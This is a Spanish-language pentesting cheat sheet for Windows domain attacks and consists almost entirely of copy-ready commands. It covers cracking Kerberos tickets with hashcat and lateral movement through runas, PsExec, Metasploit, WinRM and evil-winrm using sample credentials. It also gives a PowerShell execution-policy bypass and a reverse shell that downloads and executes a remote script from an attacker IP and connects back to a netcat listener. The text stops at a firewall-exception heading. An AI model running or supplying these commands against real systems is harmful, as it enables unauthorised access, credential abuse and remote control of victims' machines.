Cracking
Ticket de kerberos
Copiar hashcat -m 18200 hash/svc-test.hc18200 /usr/share/wordlists/rockyou.txt --force
Conexión remota
Windows
Runas
Copiar runas /user:xtormincorp\usuario powershell.exe
PSExec
Herramienta de Sysinternals:
Copiar psexec64.exe \\MACHINE_IP -u Administrator -p <password> -i cmd.exe
Metasploit:
Copiar use exploit/windows/smb/psexec
set RHOSTS file:/home/kali/scope.txt
set smbuser xtormin
set smbpass password123
exploit
Copiar psexec -i -s powershell.exe # Ejecución de consola interactiva con el usuario actual
WinRM
5985/tcp
(WinRM HTTP)
5986/tcp
(WinRM HTTPS)
CMD:
Copiar winrs.exe -u:Administrator -p:Mypass123 -r:target cmd
PowerShell:
Primero se debe crear un objeto PSCredential con las credenciales del usuario:
Copiar $username = 'Administrator';
$password = 'Mypass123';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
Copiar Enter-PSSession -Computername TARGET -Credential $credential
Ejecutar ScriptBlocks vía WinRM:
Copiar Invoke-Command -Computername TARGET -Credential $credential -ScriptBlock {whoami}
Netexec
Copiar IP='10.10.10.100'
USER='xtormin'
PASS='password123'
netexec winrm $IP -u $USER -p $PASS
Linux
Copiar evil-winrm -i 192.168.1.100 -u <usuario> -p <contraseña>
Habilitar ejecución de scripts
El siguiente comando permite modificar la política de PowerShell de forma que se permita la ejecución de todos los scripts sin firmar y sin aplicar restricciones ni advertencias (-exec bypass). Además, no se carga el perfil del usuario, lo que permite evadir posibles restricciones (-nop).
Copiar powershell -nop -exec bypass
Reverse shell
Desde la máquina atacante:
Copiar C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443
Desde la máquina víctima:
Copiar powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://192.168.1.100/Invoke-PowerShellTcp.ps1'));Power -Reverse -IPAddress 192.168.1.100 -Port 443
powershell.exe iex (iwr http://192.168.1.100/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress 192.168.1.100 -Port 443
Agregar excepción en el firewall